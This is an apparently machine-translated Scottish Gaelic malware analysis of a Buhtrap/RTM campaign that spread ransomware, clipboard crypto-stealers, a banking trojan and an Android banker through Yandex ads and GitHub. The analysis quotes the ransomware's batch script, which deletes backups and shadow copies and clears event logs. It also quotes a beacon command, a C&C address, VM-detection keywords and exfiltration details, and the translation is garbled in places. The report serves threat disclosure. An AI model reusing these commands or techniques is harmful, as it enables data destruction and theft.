Gus cuimseachadh air luchd-cunntais ann an ionnsaigh saidhbear, faodaidh tu na sgrìobhainnean obrach a bhios iad a’ lorg air-loidhne a chleachdadh. Is e seo an ìre mhath a tha buidheann saidhbear air a bhith a’ dèanamh thairis air na mìosan a dh ’fhalbh, a’ cuairteachadh backdoors aithnichte. и , a bharrachd air crioptairean agus bathar-bog airson a bhith a’ goid cryptocurrencies. Tha a’ mhòr-chuid de thargaidean suidhichte anns an Ruis. Chaidh an ionnsaigh a dhèanamh le bhith a’ cur sanasachd droch-rùnach air Yandex.Direct. Chaidh luchd-fulaing a dh’ fhaodadh a bhith air an stiùireadh gu làrach-lìn far an deach iarraidh orra faidhle droch-rùnach a luchdachadh sìos air a chòmhdach mar theamplaid sgrìobhainn. Thug Yandex air falbh an t-sanasachd droch-rùnach às deidh ar rabhadh.
Chaidh còd stòr Buhtrap a leigeil a-mach air-loidhne roimhe seo gus an urrainn do dhuine sam bith a chleachdadh. Chan eil fiosrachadh sam bith againn a thaobh cothrom air còd RTM.
Anns an dreuchd seo innsidh sinn dhut mar a sgaoil an luchd-ionnsaigh malware a’ cleachdadh Yandex.Direct agus a thug aoigheachd dha air GitHub. Thig am post gu crìch le mion-sgrùdadh teignigeach air an malware.
Tha Buhtrap agus RTM air ais ann an gnìomhachas
Uidheam sgaoilidh agus luchd-fulaing
Bidh na diofar luchdan pàighidh a thèid a lìbhrigeadh do luchd-fulaing a’ co-roinn dòigh iomadachaidh cumanta. Chaidh a h-uile faidhle droch-rùnach a chruthaich an luchd-ionnsaigh a chuir ann an dà stòr GitHub eadar-dhealaichte.
Mar as trice, bha aon fhaidhle droch-rùnach a ghabhas luchdachadh a-nuas anns an stòr, a dh’ atharraich gu tric. Leis gum faic thu eachdraidh atharrachaidhean ann an stòr air GitHub, chì sinn dè an seòrsa malware a chaidh a sgaoileadh ann an ùine sònraichte. Gus toirt air an neach-fulang am faidhle droch-rùnach a luchdachadh sìos, chaidh an làrach-lìn blanki-shabloni24[.]ru, a chithear san fhigear gu h-àrd, a chleachdadh.
Tha dealbhadh na làraich agus ainmean nam faidhlichean droch-rùnach a 'leantainn aon bhun-bheachd - foirmean, teamplaidean, cùmhnantan, samples, msaa. tha ro-innleachd an aon rud anns an iomairt ùr. Is e an aon cheist ciamar a ràinig an neach-fulang làrach an luchd-ionnsaigh.
Infection
Bha co-dhiù grunn luchd-fulaing comasach a thàinig gu crìch air an làrach seo air an tàladh le sanasachd droch-rùnach. Gu h-ìosal tha eisimpleir URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Mar a chì thu bhon cheangal, chaidh a’ bhratach a phostadh air an fhòram cunntasachd dligheach bb.f2[.]kz. Tha e cudromach cuimhneachadh gun do nochd na brataichean air diofar làraich, bha an aon iomairt id (blanki_rsya) aca uile, agus a’ mhòr-chuid co-cheangailte ri cunntasachd no seirbheisean taic laghail. Tha an URL a’ sealltainn gun do chleachd an neach-fulang an t-iarrtas “luchdaich sìos foirm fhàirdeal,” a tha a’ toirt taic don bheachd-bharail againn mu ionnsaighean cuimsichte. Gu h-ìosal tha na làraich far an do nochd na brataichean agus na ceistean rannsachaidh co-fhreagarrach.
- luchdaich sìos foirm fhàirdeal - bb.f2[.]kz
- sampall cùmhnant - Ipopen[.]ru
- sampall gearan tagraidh - 77metrov[.]ru
- foirm aonta - bàn-dogovor-kupli-prodazhi[.]ru
- sampall athchuinge cùirte - zen.yandex[.]ru
- sampall gearan - yurday[.]ru
- eisimpleirean de fhoirmean cùmhnant - Regforum[.]ru
- foirm cùmhnant - Assistantus[.]ru
- sampall aonta àros - napravah[.]com
- eisimpleirean de chùmhnantan laghail - avito[.]ru
Is dòcha gun deach an làrach blanki-shabloni24[.]ru a rèiteachadh gus faighinn seachad air measadh lèirsinneach sìmplidh. Mar as trice, chan eil sanas a tha a’ comharrachadh làrach proifeasanta le ceangal ri GitHub a’ coimhead coltach ri rudeigin dona. A bharrachd air an sin, cha do chuir an luchd-ionnsaigh suas faidhlichean droch-rùnach chun stòr ach airson ùine chuingealaichte, is dòcha tron iomairt. A’ mhòr-chuid den ùine, bha tasglann zip falamh no faidhle EXE falamh ann an stòr GitHub. Mar sin, dh’ fhaodadh luchd-ionnsaigh sanasachd a sgaoileadh tro Yandex.Direct air làraich air an do thadhail luchd-cunntais a thàinig mar fhreagairt do cheistean rannsachaidh sònraichte.
An ath rud, leig dhuinn sùil a thoirt air na diofar luchdan pàighidh air an sgaoileadh san dòigh seo.
Mion-sgrùdadh pàighidh
Eachdraidh sgaoilidh
Thòisich an iomairt droch-rùnach aig deireadh an Dàmhair 2018 agus tha i gnìomhach aig àm sgrìobhaidh. Leis gu robh an stòr gu lèir ri fhaighinn gu poblach air GitHub, chuir sinn ri chèile loidhne-tìm cheart de sgaoileadh sia teaghlaichean malware eadar-dhealaichte (faic am figear gu h-ìosal). Tha sinn air loidhne a chuir ris a sheallas cuin a chaidh an ceangal bratach a lorg, mar a chaidh a thomhas le telemetry ESET, airson coimeas ri eachdraidh git. Mar a chì thu, tha seo gu math co-cheangailte ris na tha ri fhaighinn den uallach pàighidh air GitHub. Faodar an eadar-dhealachadh aig deireadh a ’Ghearrain a mhìneachadh leis nach robh pàirt againn den eachdraidh atharrachaidh leis gun deach an stòr a thoirt air falbh bho GitHub mus fhaigh sinn e gu h-iomlan.
Figear 1. Eachdraidh sgaoileadh malware.
Teisteanasan soidhnidh còd
Chleachd an iomairt grunn theisteanasan. Chaidh cuid a shoidhnigeadh le barrachd air aon teaghlach malware, a tha a’ nochdadh tuilleadh gur ann leis an aon iomairt a bha diofar shamhlaichean. A dh’ aindeoin an iuchair phrìobhaideach a bha ri fhaighinn, cha do chuir gnìomhaichean ainm ris na binaries gu riaghailteach agus cha do chleachd iad an iuchair airson a h-uile sampall. Aig deireadh a’ Ghearrain 2019, thòisich luchd-ionnsaigh a’ cruthachadh ainmean-sgrìobhte neo-dhligheach a’ cleachdadh teisteanas le Google far nach robh an iuchair phrìobhaideach aca.
Tha a h-uile teisteanas a tha an sàs san iomairt agus na teaghlaichean malware a tha iad a’ soidhnigeadh air an liostadh sa chlàr gu h-ìosal.
Tha sinn cuideachd air na teisteanasan soidhnidh còd seo a chleachdadh gus ceanglaichean a stèidheachadh le teaghlaichean malware eile. Airson a’ mhòr-chuid de theisteanasan, cha do lorg sinn sampallan nach deach an sgaoileadh tro stòr GitHub. Ach, chaidh an teisteanas TOV “MARIYA” a chleachdadh gus ainm a chuir ri malware a bhuineas don botnet , adware agus mèinnearan. Chan eil e coltach gu bheil an malware seo co-cheangailte ris an iomairt seo. Nas coltaiche, chaidh an teisteanas a cheannach air an darknet.
Win32/Filecoder.Buhtrap
B’ e a’ chiad phàirt a ghlac ar n-aire an Win32/Filecoder.Buhtrap a chaidh a lorg às ùr. Is e seo faidhle dà-chànanach Delphi a bhios uaireannan air a phacaigeadh. Chaidh a sgaoileadh sa mhòr-chuid sa Ghearran - Màrt 2019. Bidh e ga ghiùlan fhèin mar a tha iomchaidh do phrògram ransomware - bidh e a’ sgrùdadh dhràibhearan ionadail agus pasganan lìonraidh agus a’ cuairteachadh nam faidhlichean a chaidh a lorg. Chan fheum e ceangal eadar-lìn airson a bhith ann an cunnart a chionn 's nach cuir e fios chun an fhrithealaiche gus iuchraichean crioptachaidh a chuir. An àite sin, bidh e a’ cur “token” ri deireadh na teachdaireachd airgead-fuadain, agus a’ moladh cleachdadh post-d no Bitmessage gus fios a chuir gu gnìomhaichean.
Gus nas urrainn dhut de ghoireasan mothachail a chrioptachadh, bidh Filecoder.Buhtrap a’ ruith snàithlean a chaidh a dhealbhadh gus prìomh bhathar-bog a dhùnadh a dh’ fhaodadh a bhith aig làimhseachadh fhaidhlichean fosgailte anns a bheil fiosrachadh luachmhor a dh’ fhaodadh bacadh a chuir air crioptachadh. Is e na pròiseasan targaid sa mhòr-chuid siostaman riaghlaidh stòr-dàta (DBMS). A bharrachd air an sin, bidh Filecoder.Buhtrap a’ cuir às do fhaidhlichean log agus cùl-taic gus faighinn seachad air dàta duilich. Gus seo a dhèanamh, ruith an sgriobt baidse gu h-ìosal.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Bidh Filecoder.Buhtrap a’ cleachdadh seirbheis Logger IP dligheach air-loidhne a chaidh a dhealbhadh gus fiosrachadh a chruinneachadh mu luchd-tadhail làrach-lìn. Tha seo an dùil sùil a chumail air luchd-fulaing an ransomware, a tha an urra ris an loidhne-àithne:
mshta.exe "javascript:document.write('');"
Thèid faidhlichean airson crioptachadh a thaghadh mura h-eil iad a rèir trì liostaichean às-dùnadh. An toiseach, chan eil faidhlichean leis na leudachain a leanas air an crioptachadh: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys agus .bat. San dàrna h-àite, tha a h-uile faidhle air a bheil an t-slighe slàn anns a bheil sreangan eòlaire bhon liosta gu h-ìosal air an dùnadh a-mach.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
San treas àite, tha cuid de dh’ ainmean faidhle cuideachd air an dùnadh a-mach bho chrioptachadh, nam measg ainm faidhle an teachdaireachd airgead-fuadain. Tha an liosta air a thaisbeanadh gu h-ìosal. Gu follaiseach, tha na h-eisgeadan sin uile an dùil an inneal a chumail a’ dol, ach le glè bheag de fhreagarrachd rathaid.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Sgeama crioptachaidh faidhle
Aon uair ‘s gu bheil e air a chuir gu bàs, bidh an malware a’ gineadh prìomh phaidhir RSA 512-bit. Tha an neach-aithris prìobhaideach (d) agus modulus (n) an uairsin air an cuairteachadh le iuchair phoblach 2048-bit le còd cruaidh (neach-aithris poblach agus modulus), le pacadh zlib, agus còdachadh base64. Tha an còd le uallach airson seo ri fhaicinn ann am Figear 2.
Figear 2. Toradh Hex-Rays decompilation de phròiseas ginealach prìomh paidhir RSA 512-bit.
Gu h-ìosal tha eisimpleir de theacsa shìmplidh le iuchair phrìobhaideach air a ghineadh, a tha na chomharra ceangailte ris an teachdaireachd airgead-fuadain.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Tha iuchair phoblach an luchd-ionnsaigh air a thoirt seachad gu h-ìosal.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Tha na faidhlichean air an crioptachadh le bhith a’ cleachdadh AES-128-CBC le iuchair 256-bit. Airson gach faidhle crioptaichte, thèid iuchair ùr agus vectar tòiseachaidh ùr a chruthachadh. Tha am prìomh fhiosrachadh air a chur ri deireadh an fhaidhle crioptaichte. Beachdaichidh sinn air cruth an fhaidhle crioptaichte.
Tha an ceann-cinn a leanas aig faidhlichean crioptaichte:
Tha an dàta faidhle tùsail le luach draoidheachd VEGA air a chrioptachadh chun chiad 0x5000 bytes. Tha a h-uile fiosrachadh dì-chrioptachaidh ceangailte ri faidhle leis an structar a leanas:
- Tha comharradh meud an fhaidhle a’ sealltainn a bheil am faidhle nas motha na 0x5000 bytes ann am meud
- AES key blob = ZlibCompress (RSAEncrypt (iuchrach AES + IV, iuchair phoblach a’ phaidhir iuchrach RSA a chaidh a chruthachadh))
- blob iuchrach RSA = ZlibCompress (RSAEncrypt (iuchrach phrìobhaideach RSA air a ghineadh, iuchair phoblach RSA le còd cruaidh))
Win32/Clipbanker
Tha Win32/ClipBanker na phàirt a chaidh a sgaoileadh bho àm gu àm bho dheireadh an Dàmhair gu tràth san Dùbhlachd 2018. Is e an dleastanas a th 'aige sùil a chumail air susbaint a' chlàr-bhùird, bidh e a 'coimhead airson seòlaidhean wallets cryptocurrency. Às deidh dha seòladh an wallet targaid a dhearbhadh, bidh ClipBanker a’ cur seòladh a thathas a’ creidsinn a bhuineas don ghnìomhaiche na àite. Cha robh na sampallan a rinn sinn sgrùdadh air am bogsa no air am bacadh. Is e an aon dhòigh air giùlan a chuir am falach crioptachadh sreang. Tha seòlaidhean wallet gnìomhaiche air an cuairteachadh le bhith a’ cleachdadh RC4. Is e cryptocurrencies targaid Bitcoin, Bitcoin cash, Dogecoin, Ethereum agus Ripple.
Rè na h-ùine a bha an malware a 'sgaoileadh gu sporan Bitcoin an luchd-ionnsaigh, chaidh beagan a chuir gu VTS, a tha a' togail teagamh mu shoirbheachas na h-iomairt. A bharrachd air an sin, chan eil fianais sam bith ann gu robh na gnothaichean sin co-cheangailte ri ClipBanker idir.
Win32/RTM
Chaidh am pàirt Win32 / RTM a sgaoileadh airson grunn làithean tràth sa Mhàrt 2019. Tha RTM na bhancair Trojan sgrìobhte ann an Delphi, ag amas air siostaman bancaidh iomallach. Ann an 2017, dh'fhoillsich luchd-rannsachaidh ESET den phrògram seo, tha an tuairisgeul fhathast buntainneach. Anns an Fhaoilleach 2019, leig Palo Alto Networks a-mach cuideachd .
Buhtrap luchdadh a-nuas
Airson ùine, bha luchdachadh sìos ri fhaighinn air GitHub nach robh coltach ri innealan Buhtrap roimhe. Tha e a’ tionndadh gu https://94.100.18[.]67/RSS.php?<some_id> gus an ath ìre fhaighinn agus a luchdachadh gu dìreach gu cuimhne. Is urrainn dhuinn eadar-dhealachadh a dhèanamh air dà ghiùlan den chòd dàrna ìre. Anns a 'chiad URL, chuir RSS.php seachad air cùl-raon Buhtrap gu dìreach - tha an cùl-raon seo glè choltach ris an fhear a bha ri fhaighinn an dèidh don chòd stòr a bhith air a leigeil ma sgaoil.
Gu inntinneach, chì sinn grunn iomairtean le backdoor Buhtrap, agus thathar ag ràdh gu bheil iad air an ruith le diofar ghnìomhaichean. Anns a 'chùis seo, is e am prìomh eadar-dhealachadh gu bheil an cùl-raon air a luchdachadh gu dìreach gu cuimhne agus nach eil e a' cleachdadh an sgeama àbhaisteach leis a 'phròiseas cleachdadh DLL air an do bhruidhinn sinn. . A bharrachd air an sin, dh’ atharraich na gnìomhaichean an iuchair RC4 a chaidh a chleachdadh gus trafaic lìonra a chrioptachadh gu frithealaiche C&C. Anns a’ mhòr-chuid de na h-iomairtean a chunnaic sinn, cha do chuir gnìomhaichean dragh air an iuchair seo atharrachadh.
B’ e an dàrna giùlan, nas iom-fhillte, gun deach an URL RSS.php a chuir gu luchdan eile. Chuir e an gnìomh beagan obfuscation, leithid ath-thogail a’ chlàr in-mhalairt fiùghantach. 'S e adhbhar an bootloader fios a chur chun an fhrithealaiche C&C [.] com/api/F27F84EDA4D13B15/2, cuir na logaichean agus feitheamh ri freagairt. Bidh e a’ pròiseasadh an fhreagairt mar blob, ga luchdachadh a-steach do chuimhne agus ga chuir an gnìomh. B’ e an t-uallach pàighidh a chunnaic sinn a’ coileanadh an luchdan seo an aon chùl-raon Buhtrap, ach dh’ fhaodadh gum biodh co-phàirtean eile ann.
Android/Spy.Bancair
Gu inntinneach, chaidh pàirt airson Android a lorg cuideachd ann an stòr GitHub. Bha e sa phrìomh mheur airson dìreach aon latha - 1 Samhain, 2018. A bharrachd air a bhith air a phostadh air GitHub, chan eil telemetry ESET a’ lorg fianais sam bith gun deach an malware seo a sgaoileadh.
Chaidh am pàirt a chumail mar phasgan tagraidh Android (APK). Tha e air a dhùsgadh gu mòr. Tha an giùlan droch-rùnach falaichte ann an JAR crioptaichte a tha suidhichte san APK. Tha e air a chrioptachadh le RC4 leis an iuchair seo:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Tha an aon iuchair agus algairim air an cleachdadh gus sreangan a chrioptachadh. Tha JAR suidhichte ann an APK_ROOT + image/files. Anns a’ chiad 4 byte den fhaidhle tha fad an JAR crioptaichte, a thòisicheas dìreach às deidh an raon faid.
Às deidh dhuinn am faidhle a dhì-chrioptachadh, lorg sinn gur e Anubis a bh’ ann - roimhe seo Banca airson Android. Tha na feartan a leanas aig malware:
- clàradh microfòn
- glacadh-sgrìn
- a 'faighinn co-chomharran GPS
- meur-chlàr
- crioptachadh dàta inneal agus iarrtas airgead-fuadain
- a 'cur spama
Gu inntinneach, chleachd am bancair Twitter mar shianal conaltraidh cùl-taic gus frithealaiche C&C eile fhaighinn. Chleachd an sampall a rinn sinn mion-sgrùdadh an cunntas @JonesTrader, ach aig àm an sgrùdaidh bha e air a bhacadh mu thràth.
Anns a ’bhancair tha liosta de thagraidhean targaid air an inneal Android. Tha e nas fhaide na an liosta a fhuaireadh ann an sgrùdadh Sophos. Tha an liosta a’ toirt a-steach mòran thagraidhean bancaidh, prògraman ceannach air-loidhne leithid Amazon agus eBay, agus seirbheisean cryptocurrency.
MSIL/ClipBanker.IH
B’ e am pàirt mu dheireadh a chaidh a sgaoileadh mar phàirt den iomairt seo an gnìomh .NET Windows, a nochd sa Mhàrt 2019. Chaidh a’ mhòr-chuid de na dreachan a chaidh a sgrùdadh a phacaigeadh le ConfuserEx v1.0.0. Coltach ri ClipBanker, bidh am pàirt seo a’ cleachdadh a’ bhòrd bhidio. Is e an t-amas aige raon farsaing de cryptocurrencies, a bharrachd air tairgsean air Steam. A bharrachd air an sin, bidh e a’ cleachdadh seirbheis IP Logger gus an iuchair prìobhaideach WIF Bitcoin a ghoid.
Innealan dìon
A bharrachd air na buannachdan a tha ConfuserEx a’ toirt seachad ann a bhith a’ cur casg air dì-bhugachadh, dumpadh, agus bacadh, tha am pàirt a’ toirt a-steach comas toraidhean antivirus agus innealan brìgheil a lorg.
Gus dearbhadh gu bheil e a’ ruith ann an inneal brìgheil, bidh an malware a’ cleachdadh loidhne-àithne Windows WMI (WMIC) a chaidh a thogail a-steach gus fiosrachadh BIOS iarraidh, is iad sin:
wmic bios
An uairsin bidh am prògram a’ parsadh toradh an àithne agus a’ coimhead airson prìomh fhaclan: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Gus toraidhean antivirus a lorg, bidh malware a’ cur iarrtas Ionnsramaid Riaghlaidh Windows (WMI) gu Ionad Tèarainteachd Windows a’ cleachdadh ManagementObjectSearcher API mar a chithear gu h-ìosal. Às deidh dì-chòdachadh bho base64 tha coltas mar seo air a’ ghairm:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figear 3. Pròiseas airson bathar antivirus a chomharrachadh.
A bharrachd air an sin, bidh an malware a’ sgrùdadh a bheil , inneal gus dìon an aghaidh ionnsaighean clipboard agus, ma tha e a’ ruith, cuir stad air a h-uile snàithlean sa phròiseas sin, agus mar sin a’ cur casg air an dìon.
Seasmhachd
Tha an dreach de malware a rinn sinn sgrùdadh air leth-bhreacan a-steach %APPDATA%googleupdater.exe agus a’ suidheachadh am feart “falaichte” airson an eòlaire google. An uairsin bidh i ag atharrachadh an luach SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ann an clàr Windows agus cuiridh e an t-slighe ris updater.exe. San dòigh seo, thèid an malware a chuir gu bàs a h-uile uair a logas an neach-cleachdaidh a-steach.
Giùlan droch-rùnach
Coltach ri ClipBanker, bidh an malware a’ cumail sùil air susbaint a’ bhòrd bhidio agus a’ coimhead airson seòlaidhean wallet cryptocurrency, agus nuair a lorgar iad, cuiridh e aon de sheòlaidhean a’ ghnìomhaiche na àite. Gu h-ìosal tha liosta de sheòlaidhean targaid stèidhichte air na lorgar sa chòd.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Airson gach seòrsa seòladh tha abairt cunbhalach co-fhreagarrach. Tha an luach STEAM_URL air a chleachdadh gus ionnsaigh a thoirt air an t-siostam Steam, mar a chithear bhon abairt àbhaisteach a thathas a’ cleachdadh airson mìneachadh sa bhufair:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Sianal exfiltration
A bharrachd air a bhith a’ cur an àite sheòlaidhean anns a’ bhufair, tha an malware ag amas air iuchraichean prìobhaideach WIF wallets Bitcoin, Bitcoin Core agus Electrum Bitcoin. Bidh am prògram a’ cleachdadh plogger.org mar sheanail às-shìoladh gus iuchair phrìobhaideach WIF fhaighinn. Gus seo a dhèanamh, bidh gnìomhaichean a’ cur dàta iuchair phrìobhaideach ris a’ bhann-cinn User-Agent HTTP, mar a chithear gu h-ìosal.
Figear 4. Console IP Logger le dàta toraidh.
Cha do chleachd luchd-obrachaidh iplogger.org gus wallets a chuir a-mach. Is dòcha gun do chleachd iad dòigh eile air sgàth a’ chrìoch 255 caractar san raon User-Agentair a thaisbeanadh ann an eadar-aghaidh lìn IP Logger. Anns na sampallan a rinn sinn sgrùdadh, chaidh an frithealaiche toraidh eile a stòradh ann an caochladair na h-àrainneachd DiscordWebHook. Gu iongantach, chan eil an caochladair àrainneachd seo air a shònrachadh àite sam bith sa chòd. Tha seo a 'moladh gu bheil an malware fhathast ga leasachadh agus gu bheil an caochladair air a shònrachadh do inneal deuchainn a' ghnìomhaiche.
Tha soidhne eile ann gu bheil am prògram ga leasachadh. Tha dà URL iplogger.org anns an fhaidhle dà-chànanach, agus thèid an dà chuid a cheasnachadh nuair a thèid dàta a thoirt a-mach. Ann an iarrtas gu aon de na URLan sin, tha “DEV /” air thoiseach air an luach anns an raon Referer. Lorg sinn cuideachd dreach nach deach a phacaigeadh a’ cleachdadh ConfuserEx, is e DevFeedbackUrl an t-ainm a gheibh an URL seo. Stèidhichte air ainm caochlaideach na h-àrainneachd, tha sinn den bheachd gu bheil an luchd-obrachaidh an dùil an t-seirbheis dligheach Discord agus an siostam eadar-ghabhail lìn aige a chleachdadh gus wallets cryptocurrency a ghoid.
co-dhùnadh
Tha an iomairt seo na eisimpleir air cleachdadh sheirbheisean sanasachd dligheach ann an ionnsaighean saidhbear. Tha an sgeama ag amas air buidhnean Ruiseanach, ach cha bhiodh e na iongnadh dhuinn a leithid de ionnsaigh fhaicinn a’ cleachdadh seirbheisean neo-Ruiseanach. Gus co-rèiteachadh a sheachnadh, feumaidh luchd-cleachdaidh a bhith misneachail ann an cliù stòr a’ bhathar-bog a luchdaicheas iad sìos.
Tha liosta iomlan de chomharran co-rèiteachaidh agus buadhan MITER ATT&CK ri fhaighinn aig .
Source: www.habr.com